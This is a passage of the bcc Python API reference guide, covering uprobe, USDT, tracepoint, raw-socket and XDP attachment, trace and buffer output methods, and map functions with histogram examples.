<a href="https://github.com/iovisor/bcc/search?q=attach_tracepoint+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-attach_uprobe"><a class="header" href="#4-attach_uprobe">4. attach_uprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_uprobe(name="location", sym="symbol", fn_name="name" [, sym_off=int])</code>, <code>BPF.attach_uprobe(name="location", sym_re="regex", fn_name="name")</code>, <code>BPF.attach_uprobe(name="location", addr=int, fn_name="name")</code></p>
|
||
<p>Instruments the user-level function <code>symbol()</code> from either the library or binary named by <code>location</code> using user-level dynamic tracing of the function entry, and attaches our C defined function <code>name()</code> to be called whenever the user-level function is called. If <code>sym_off</code> is given, the function is attached to the offset within the symbol.</p>
|
||
<p>The real address <code>addr</code> may be supplied in place of <code>sym</code>, in which case <code>sym</code> must be set to its default value. If the file is a non-PIE executable, <code>addr</code> must be a virtual address, otherwise it must be an offset relative to the file load address.</p>
|
||
<p>Instead of a symbol name, a regular expression can be provided in <code>sym_re</code>. The uprobe will then attach to symbols that match the provided regular expression.</p>
|
||
<p>Libraries can be given in the name argument without the lib prefix, or with the full path (/usr/lib/...). Binaries can be given only with the full path (/bin/sh).</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_uprobe(name="c", sym="strlen", fn_name="count")
|
||
</code></pre>
|
||
<p>This will instrument the <code>strlen()</code> function from libc, and call our BPF function <code>count()</code> when it is called. Note how the "lib" in "libc" is not necessary to specify.</p>
|
||
<p>Other examples:</p>
|
||
<pre><code class="language-Python">b.attach_uprobe(name="c", sym="getaddrinfo", fn_name="do_entry")
|
||
b.attach_uprobe(name="/usr/bin/python", sym="main", fn_name="do_main")
|
||
</code></pre>
|
||
<p>You can call attach_uprobe() more than once, and attach your BPF function to multiple user-level functions.</p>
|
||
<p>See the previous uprobes section for how to instrument arguments from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="5-attach_uretprobe"><a class="header" href="#5-attach_uretprobe">5. attach_uretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_uretprobe(name="location", sym="symbol", fn_name="name")</code></p>
|
||
<p>Instruments the return of the user-level function <code>symbol()</code> from either the library or binary named by <code>location</code> using user-level dynamic tracing of the function return, and attaches our C defined function <code>name()</code> to be called whenever the user-level function returns.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_uretprobe(name="c", sym="strlen", fn_name="count")
|
||
</code></pre>
|
||
<p>This will instrument the <code>strlen()</code> function from libc, and call our BPF function <code>count()</code> when it returns.</p>
|
||
<p>Other examples:</p>
|
||
<pre><code class="language-Python">b.attach_uretprobe(name="c", sym="getaddrinfo", fn_name="do_return")
|
||
b.attach_uretprobe(name="/usr/bin/python", sym="main", fn_name="do_main")
|
||
</code></pre>
|
||
<p>You can call attach_uretprobe() more than once, and attach your BPF function to multiple user-level functions.</p>
|
||
<p>See the previous uretprobes section for how to instrument the return value from BPF.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uretprobe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_uretprobe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="6-usdtenable_probe"><a class="header" href="#6-usdtenable_probe">6. USDT.enable_probe()</a></h3>
|
||
<p>Syntax: <code>USDT.enable_probe(probe=probe, fn_name=name)</code></p>
|
||
<p>Attaches a BPF C function <code>name</code> to the USDT probe <code>probe</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># enable USDT probe from given PID
|
||
u = USDT(pid=int(pid))
|
||
u.enable_probe(probe="http__server__request", fn_name="do_trace")
|
||
</code></pre>
|
||
<p>To check if your binary has USDT probes, and what they are, you can run <code>readelf -n binary</code> and check the stap debug section.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=enable_probe+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=enable_probe+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="7-attach_raw_tracepoint"><a class="header" href="#7-attach_raw_tracepoint">7. attach_raw_tracepoint()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_raw_tracepoint(tp="tracepoint", fn_name="name")</code></p>
|
||
<p>Instruments the kernel raw tracepoint described by <code>tracepoint</code> (<code>event</code> only, no <code>category</code>), and when hit, runs the BPF function <code>name()</code>.</p>
|
||
<p>This is an explicit way to instrument tracepoints. The <code>RAW_TRACEPOINT_PROBE</code> syntax, covered in the earlier raw tracepoints section, is an alternate method.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_raw_tracepoint("sched_switch", "do_trace")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_raw_tracepoint+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="8-attach_raw_socket"><a class="header" href="#8-attach_raw_socket">8. attach_raw_socket()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_raw_socket(fn, dev)</code></p>
|
||
<p>Attaches a BPF function to the specified network interface.</p>
|
||
<p>The <code>fn</code> must be of type <code>BPF.function</code> and the bpf_prog type needs to be <code>BPF_PROG_TYPE_SOCKET_FILTER</code> (<code>fn=BPF.load_func(func_name, BPF.SOCKET_FILTER)</code>).</p>
|
||
<p><code>fn.sock</code> is a non-blocking raw socket that was created and bound to <code>dev</code>.</p>
|
||
<p>All network packets processed by <code>dev</code> are copied to the <code>recv-q</code> of <code>fn.sock</code> after being processed by bpf_prog. Try to receive packets from <code>fn.sock</code> with recv/recvfrom/recvmsg. Note that if the <code>recv-q</code> is not read in time after the <code>recv-q</code> is full, the copied packets will be discarded.</p>
|
||
<p>We can use this feature to capture network packets just like <code>tcpdump</code>.</p>
|
||
<p>We can use <code>ss --bpf --packet -p</code> to observe <code>fn.sock</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">BPF.attach_raw_socket(bpf_func, ifname)
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_raw_socket+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="9-attach_xdp"><a class="header" href="#9-attach_xdp">9. attach_xdp()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_xdp(dev="device", fn=b.load_func("fn_name",BPF.XDP), flags)</code></p>
|
||
<p>Instruments the network driver described by <code>dev</code>, and when it receives a packet, runs the BPF function <code>fn_name()</code> with flags.</p>
|
||
<p>Here is a list of optional flags.</p>
|
||
<pre><code class="language-Python"># from xdp_flags uapi/linux/if_link.h
|
||
XDP_FLAGS_UPDATE_IF_NOEXIST = (1 << 0)
|
||
XDP_FLAGS_SKB_MODE = (1 << 1)
|
||
XDP_FLAGS_DRV_MODE = (1 << 2)
|
||
XDP_FLAGS_HW_MODE = (1 << 3)
|
||
XDP_FLAGS_REPLACE = (1 << 4)
|
||
</code></pre>
|
||
<p>You can use flags like this <code>BPF.attach_xdp(dev="device", fn=b.load_func("fn_name",BPF.XDP), flags=BPF.XDP_FLAGS_UPDATE_IF_NOEXIST)</code></p>
|
||
<p>The default value of flags is 0. This means that if no XDP program is attached to <code>device</code>, <code>fn</code> will be attached to it; if an XDP program is already attached to <code>device</code>, the old program will be replaced with the new <code>fn</code> program.</p>
|
||
<p>Currently, bcc does not support XDP_FLAGS_REPLACE flag. The following are the descriptions of other flags.</p>
|
||
<h4 id="1-xdp_flags_update_if_noexist"><a class="header" href="#1-xdp_flags_update_if_noexist">1. XDP_FLAGS_UPDATE_IF_NOEXIST</a></h4>
|
||
<p>If an XDP program is already attached to the specified driver, attaching the XDP program again will fail.</p>
|
||
<h4 id="2-xdp_flags_skb_mode"><a class="header" href="#2-xdp_flags_skb_mode">2. XDP_FLAGS_SKB_MODE</a></h4>
|
||
<p>Driver doesn’t have support for XDP, but the kernel fakes it.
|
||
XDP program works, but there’s no real performance benefit because packets are handed to kernel stack anyways which then emulates XDP – this is usually supported with generic network drivers used in home computers, laptops, and virtualized HW.</p>
|
||
<h4 id="3-xdp_flags_drv_mode"><a class="header" href="#3-xdp_flags_drv_mode">3. XDP_FLAGS_DRV_MODE</a></h4>
|
||
<p>A driver has XDP support and can hand packets to XDP without kernel stack interaction – few drivers support it, and those are usually for enterprise HW.</p>
|
||
<h4 id="4-xdp_flags_hw_mode"><a class="header" href="#4-xdp_flags_hw_mode">4. XDP_FLAGS_HW_MODE</a></h4>
|
||
<p>XDP can be loaded and executed directly on the NIC – just a handful of NICs can do that.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_xdp(dev="ens1", fn=b.load_func("do_xdp", BPF.XDP))
|
||
</code></pre>
|
||
<p>This will instrument the network device <code>ens1</code>, which will then run our BPF defined <code>do_xdp()</code> function each time it receives packets.</p>
|
||
<p>Don't forget to call <code>b.remove_xdp("ens1")</code> at the end!</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_xdp+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=attach_xdp+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="10-attach_func"><a class="header" href="#10-attach_func">10. attach_func()</a></h3>
|
||
<p>Syntax: <code>BPF.attach_func(fn, attachable_fd, attach_type [, flags])</code></p>
|
||
<p>Attaches a BPF function of the specified type to a particular <code>attachable_fd</code>. If the <code>attach_type</code> is <code>BPF_FLOW_DISSECTOR</code>, the function is expected to attach to the current net namespace and <code>attachable_fd</code> must be 0.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.attach_func(fn, cgroup_fd, BPFAttachType.CGROUP_SOCK_OPS)
|
||
b.attach_func(fn, map_fd, BPFAttachType.SK_MSG_VERDICT)
|
||
</code></pre>
|
||
<p>Note: when attaching to "global" hooks (xdp, tc, lwt, cgroup), if the "BPF function" is no longer needed after the program terminates, be sure to call <code>detach_func</code> when the program exits.</p>
|
||
<p>Examples in situ:</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=attach_func+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="11-detach_func"><a class="header" href="#11-detach_func">11. detach_func()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_func(fn, attachable_fd, attach_type)</code></p>
|
||
<p>Detaches a BPF function of the specified type.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_func(fn, cgroup_fd, BPFAttachType.CGROUP_SOCK_OPS)
|
||
b.detach_func(fn, map_fd, BPFAttachType.SK_MSG_VERDICT)
|
||
</code></pre>
|
||
<p>Examples in situ:</p>
|
||
<p><a href="https://github.com/iovisor/bcc/search?q=detach_func+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="12-detach_kprobe"><a class="header" href="#12-detach_kprobe">12. detach_kprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_kprobe(event="event", fn_name="name")</code></p>
|
||
<p>Detach a kprobe handler function of the specified event.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_kprobe(event="__page_cache_alloc", fn_name="trace_func_entry")
|
||
</code></pre>
|
||
<h3 id="13-detach_kretprobe"><a class="header" href="#13-detach_kretprobe">13. detach_kretprobe()</a></h3>
|
||
<p>Syntax: <code>BPF.detach_kretprobe(event="event", fn_name="name")</code></p>
|
||
<p>Detach a kretprobe handler function of the specified event.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-Python">b.detach_kretprobe(event="__page_cache_alloc", fn_name="trace_func_return")
|
||
</code></pre>
|
||
<h2 id="debug-output"><a class="header" href="#debug-output">Debug Output</a></h2>
|
||
<h3 id="1-trace_print"><a class="header" href="#1-trace_print">1. trace_print()</a></h3>
|
||
<p>Syntax: <code>BPF.trace_print(fmt="fields")</code></p>
|
||
<p>This method continually reads the globally shared /sys/kernel/debug/tracing/trace_pipe file and prints its contents. This file can be written to via BPF and the bpf_trace_printk() function, however, that method has limitations, including a lack of concurrent tracing support. The BPF_PERF_OUTPUT mechanism, covered earlier, is preferred.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li><code>fmt</code>: optional, and can contain a field formatting string. It defaults to <code>None</code>.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python"># print trace_pipe output as-is:
|
||
b.trace_print()
|
||
|
||
# print PID and message:
|
||
b.trace_print(fmt="{1} {5}")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_print+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_print+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-trace_fields"><a class="header" href="#2-trace_fields">2. trace_fields()</a></h3>
|
||
<p>Syntax: <code>BPF.trace_fields(nonblocking=False)</code></p>
|
||
<p>This method reads one line from the globally shared /sys/kernel/debug/tracing/trace_pipe file and returns it as fields. This file can be written to via BPF and the bpf_trace_printk() function, however, that method has limitations, including a lack of concurrent tracing support. The BPF_PERF_OUTPUT mechanism, covered earlier, is preferred.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li><code>nonblocking</code>: optional, defaults to <code>False</code>. When set to <code>True</code>, the program will not block waiting for input.</li>
|
||
</ul>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python">while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_fields+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=trace_fields+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h2 id="output-apis"><a class="header" href="#output-apis">Output APIs</a></h2>
|
||
<p>Normal output from a BPF program is either:</p>
|
||
<ul>
|
||
<li>per-event: using BPF_PERF_OUTPUT, open_perf_buffer(), and perf_buffer_poll().</li>
|
||
<li>map summary: using items(), or print_log2_hist(), covered in the Maps section.</li>
|
||
</ul>
|
||
<h3 id="1-perf_buffer_poll"><a class="header" href="#1-perf_buffer_poll">1. perf_buffer_poll()</a></h3>
|
||
<p>Syntax: <code>BPF.perf_buffer_poll(timeout=T)</code></p>
|
||
<p>This polls from all open perf ring buffers, calling the callback function that was provided when calling open_perf_buffer for each entry.</p>
|
||
<p>The timeout parameter is optional and measured in milliseconds. In its absence, polling continues indefinitely.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.perf_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/v0.9.0/examples/tracing/hello_perf_output.py#L55">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_buffer_poll+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=perf_buffer_poll+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="2-ring_buffer_poll"><a class="header" href="#2-ring_buffer_poll">2. ring_buffer_poll()</a></h3>
|
||
<p>Syntax: <code>BPF.ring_buffer_poll(timeout=T)</code></p>
|
||
<p>This polls from all open ringbuf ring buffers, calling the callback function that was provided when calling open_ring_buffer for each entry.</p>
|
||
<p>The timeout parameter is optional and measured in milliseconds. In its absence, polling continues until
|
||
there is no more data or the callback returns a negative value.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_poll(30)
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ring_buffer_poll+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h3 id="3-ring_buffer_consume"><a class="header" href="#3-ring_buffer_consume">3. ring_buffer_consume()</a></h3>
|
||
<p>Syntax: <code>BPF.ring_buffer_consume()</code></p>
|
||
<p>This consumes from all open ringbuf ring buffers, calling the callback function that was provided when calling open_ring_buffer for each entry.</p>
|
||
<p>Unlike <code>ring_buffer_poll</code>, this method <strong>does not poll for data</strong> before attempting to consume.
|
||
This reduces latency at the expense of higher CPU consumption. If you are unsure which to use,
|
||
use <code>ring_buffer_poll</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># loop with callback to print_event
|
||
b["events"].open_ring_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.ring_buffer_consume()
|
||
except KeyboardInterrupt:
|
||
exit();
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=ring_buffer_consume+path%3Aexamples+language%3Apython&type=Code">search /examples</a></p>
|
||
<h2 id="map-apis"><a class="header" href="#map-apis">Map APIs</a></h2>
|
||
<p>Maps are BPF data stores, and are used in bcc to implement a table, and then higher level objects on top of tables, including hashes and histograms.</p>
|
||
<h3 id="1-get_table"><a class="header" href="#1-get_table">1. get_table()</a></h3>
|
||
<p>Syntax: <code>BPF.get_table(name)</code></p>
|
||
<p>Returns a table object. This is no longer used, as tables can now be read as items from BPF. Eg: <code>BPF[name]</code>.</p>
|
||
<p>Examples:</p>
|
||
<pre><code class="language-Python">counts = b.get_table("counts")
|
||
|
||
counts = b["counts"]
|
||
</code></pre>
|
||
<p>These are equivalent.</p>
|
||
<h3 id="2-open_perf_buffer"><a class="header" href="#2-open_perf_buffer">2. open_perf_buffer()</a></h3>
|
||
<p>Syntax: <code>table.open_perf_buffer(callback, page_cnt=N, lost_cb=None)</code></p>
|
||
<p>This operates on a table as defined in BPF as BPF_PERF_OUTPUT(), and associates the callback Python function <code>callback</code> to be called when data is available in the perf ring buffer. This is part of the recommended mechanism for transferring per-event data from kernel to user space. The size of the perf ring buffer can be specified via the <code>page_cnt</code> parameter, which must be a power of two number of pages and defaults to 8. If the callback is not processing data fast enough, some submitted data may be lost. <code>lost_cb</code> will be called to log / monitor the lost count. If <code>lost_cb</code> is the default <code>None</code> value, it will just print a one-line message to <code>stderr</code>.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># process event
|
||
def print_event(cpu, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
try:
|
||
b.perf_buffer_poll()
|
||
except KeyboardInterrupt:
|
||
exit()
|
||
</code></pre>
|
||
<p>Note that the data structure transferred will need to be declared in C in the BPF program. For example:</p>
|
||
<pre><code class="language-C">// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
[...]
|
||
</code></pre>
|
||
<p>In Python, you can either let bcc generate the data structure from C declaration automatically (recommended):</p>
|
||
<pre><code class="language-Python">def print_event(cpu, data, size):
|
||
event = b["events"].event(data)
|
||
[...]
|
||
</code></pre>
|
||
<p>or define it manually:</p>
|
||
<pre><code class="language-Python"># define output data structure in Python
|
||
TASK_COMM_LEN = 16 # linux/sched.h
|
||
class Data(ct.Structure):
|
||
_fields_ = [("pid", ct.c_ulonglong),
|
||
("ts", ct.c_ulonglong),
|
||
("comm", ct.c_char * TASK_COMM_LEN)]
|
||
|
||
def print_event(cpu, data, size):
|
||
event = ct.cast(data, ct.POINTER(Data)).contents
|
||
[...]
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/v0.9.0/examples/tracing/hello_perf_output.py#L52">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_perf_buffer+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=open_perf_buffer+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="3-items"><a class="header" href="#3-items">3. items()</a></h3>
|
||
<p>Syntax: <code>table.items()</code></p>
|
||
<p>Returns an array of the key/value pairs in a table. This can be used with BPF_HASH maps to fetch, and iterate over, the keys and their values.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print output
|
||
print("%10s %s" % ("COUNT", "STRING"))
|
||
counts = b.get_table("counts")
|
||
for k, v in sorted(counts.items(), key=lambda counts: counts[1].value):
|
||
print("%10d \"%s\"" % (v.value, k.c.encode('string-escape')))
|
||
</code></pre>
|
||
<p>This example also uses the <code>sorted()</code> function to sort by value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=items+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=items+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="4-values"><a class="header" href="#4-values">4. values()</a></h3>
|
||
<p>Syntax: <code>table.values()</code></p>
|
||
<p>Returns an array of the values in a table.</p>
|
||
<h3 id="5-clear"><a class="header" href="#5-clear">5. clear()</a></h3>
|
||
<p>Syntax: <code>table.clear()</code></p>
|
||
<p>Clears the table: deletes all entries.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print map summary every second:
|
||
while True:
|
||
time.sleep(1)
|
||
print("%-8s\n" % time.strftime("%H:%M:%S"), end="")
|
||
dist.print_log2_hist(sym + " return:")
|
||
dist.clear()
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=clear+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=clear+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="6-items_lookup_and_delete_batch"><a class="header" href="#6-items_lookup_and_delete_batch">6. items_lookup_and_delete_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_lookup_and_delete_batch()</code></p>
|
||
<p>Returns an array of the key/value pairs in a table with a single call to the BPF syscall. This can be used with BPF_HASH maps to fetch, and iterate over, the keys and their values. It also clears the table: deletes all entries.
|
||
You should rather use table.items_lookup_and_delete_batch() than table.items() followed by table.clear(). It requires kernel v5.6.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print call rate per second:
|
||
print("%9s-%9s-%8s-%9s" % ("PID", "COMM", "fname", "counter"))
|
||
while True:
|
||
for k, v in sorted(b['map'].items_lookup_and_delete_batch(), key=lambda kv: (kv[0]).pid):
|
||
print("%9s-%9s-%8s-%9d" % (k.pid, k.comm, k.fname, v.counter))
|
||
sleep(1)
|
||
</code></pre>
|
||
<h3 id="7-items_lookup_batch"><a class="header" href="#7-items_lookup_batch">7. items_lookup_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_lookup_batch()</code></p>
|
||
<p>Returns an array of the key/value pairs in a table with a single call to the BPF syscall. This can be used with BPF_HASH maps to fetch, and iterate over, the keys and their values.
|
||
You should rather use table.items_lookup_batch() than table.items(). It requires kernel v5.6.</p>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python"># print current value of map:
|
||
print("%9s-%9s-%8s-%9s" % ("PID", "COMM", "fname", "counter"))
|
||
while True:
|
||
for k, v in sorted(b['map'].items_lookup_batch(), key=lambda kv: (kv[0]).pid):
|
||
print("%9s-%9s-%8s-%9d" % (k.pid, k.comm, k.fname, v.counter))
|
||
</code></pre>
|
||
<h3 id="8-items_delete_batch"><a class="header" href="#8-items_delete_batch">8. items_delete_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_delete_batch(keys)</code></p>
|
||
<p>It clears all entries of a BPF_HASH map when keys is None. It is more efficient than table.clear() since it generates only one system call. You can delete a subset of a map by giving an array of keys as parameter. Those keys and their associated values will be deleted. It requires kernel v5.6.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>keys is optional and by default is None.</li>
|
||
</ul>
|
||
<h3 id="9-items_update_batch"><a class="header" href="#9-items_update_batch">9. items_update_batch()</a></h3>
|
||
<p>Syntax: <code>table.items_update_batch(keys, values)</code></p>
|
||
<p>Update all the provided keys with new values. The two arguments must be the same length and within the map limits (between 1 and the maximum entries). It requires kernel v5.6.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>keys is the list of keys to be updated</li>
|
||
<li>values is the list containing the new values.</li>
|
||
</ul>
|
||
<h3 id="10-print_log2_hist"><a class="header" href="#10-print_log2_hist">10. print_log2_hist()</a></h3>
|
||
<p>Syntax: <code>table.print_log2_hist(val_type="value", section_header="Bucket ptr", section_print_fn=None)</code></p>
|
||
<p>Prints a table as a log2 histogram in ASCII. The table must be stored as log2, which can be done using the BPF function <code>bpf_log2l()</code>.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>val_type: optional, column header.</li>
|
||
<li>section_header: if the histogram has a secondary key, multiple tables will print and section_header can be used as a header description for each.</li>
|
||
<li>section_print_fn: if section_print_fn is not None, it will be passed the bucket value.</li>
|
||
</ul>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">b = BPF(text="""
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(bpf_log2l(req->__data_len / 1024));
|
||
return 0;
|
||
}
|
||
""")
|
||
[...]
|
||
|
||
b["dist"].print_log2_hist("kbytes")
|
||
</code></pre>
|
||
<p>Output:</p>
|
||
<pre><code class="language-sh"> kbytes : count distribution
|
||
0 -> 1 : 3 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 211 |********** |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 800 |**************************************|
|
||
</code></pre>
|
||
<p>This output shows a multi-modal distribution, with the largest mode of 128->255 kbytes and a count of 800.</p>
|
||
<p>This is an efficient way to summarize data, as the summarization is performed in-kernel, and only the count column is passed to user space.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_log2_hist+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_log2_hist+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="11-print_linear_hist"><a class="header" href="#11-print_linear_hist">11. print_linear_hist()</a></h3>
|
||
<p>Syntax: <code>table.print_linear_hist(val_type="value", section_header="Bucket ptr", section_print_fn=None)</code></p>
|
||
<p>Prints a table as a linear histogram in ASCII. This is intended to visualize small integer ranges, eg, 0 to 100.</p>
|
||
<p>Arguments:</p>
|
||
<ul>
|
||
<li>val_type: optional, column header.</li>
|
||
<li>section_header: if the histogram has a secondary key, multiple tables will print and section_header can be used as a header description for each.</li>
|
||
<li>section_print_fn: if section_print_fn is not None, it will be passed the bucket value.</li>
|
||
</ul>
|
||
<p>Example:</p>
|
||
<pre><code class="language-Python">b = BPF(text="""
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(req->__data_len / 1024);
|
||
return 0;
|
||
}
|
||
""")
|
||
[...]
|
||
|
||
b["dist"].print_linear_hist("kbytes")
|
||
</code></pre>
|
||
<p>Output:</p>
|
||
<pre><code class="language-sh"> kbytes : count distribution
|
||
0 : 3 |****** |
|
||
1 : 0 | |
|
||
2 : 0 | |
|
||
3 : 0 | |
|
||
4 : 19 |****************************************|
|
||
5 : 0 | |
|
||
6 : 0 | |
|
||
7 : 0 | |
|
||
8 : 4 |******** |
|
||
9 : 0 | |
|
||
10 : 0 | |
|
||
11 : 0 | |
|
||
12 : 0 | |
|
||
13 : 0 | |
|
||
14 : 0 | |
|
||
15 : 0 | |
|
||
16 : 2 |**** |
|
||
[...]
|
||
</code></pre>
|
||
<p>This is an efficient way to summarize data, as the summarization is performed in-kernel, and only the values in the count column are passed to user space.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_linear_hist+path%3Aexamples+language%3Apython&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=print_linear_hist+path%3Atools+language%3Apython&type=Code">search /tools</a></p>
|
||
<h3 id="12-open_ring_buffer"><a class="header" href="#12-open_ring_buffer">12. open_ring_buffer()</a></h3>
|
||
<p>Syntax: <code>table.open_ring_buffer(callback, ctx=None)</code></p>
|
||
<p>This operates on a table as defined in BPF as BPF_RINGBUF_OUTPUT(), and associates the callback Python function <code>callback</code> to be called when data is available in the ringbuf ring buffer. This is part of the new (Linux 5.8+) recommended mechanism for transferring per-event data from kernel to user space. Unlike perf buffers, ringbuf sizes are specified within the BPF program, as part of the <code>BPF_RINGBUF_OUTPUT</code> macro. If the callback is not processing data fast enough, some submitted data may be lost. In this case, the events should be polled more frequently and/or the size of the ring buffer should be increased.</p>
|
||
<p>Example:</p>
|
||
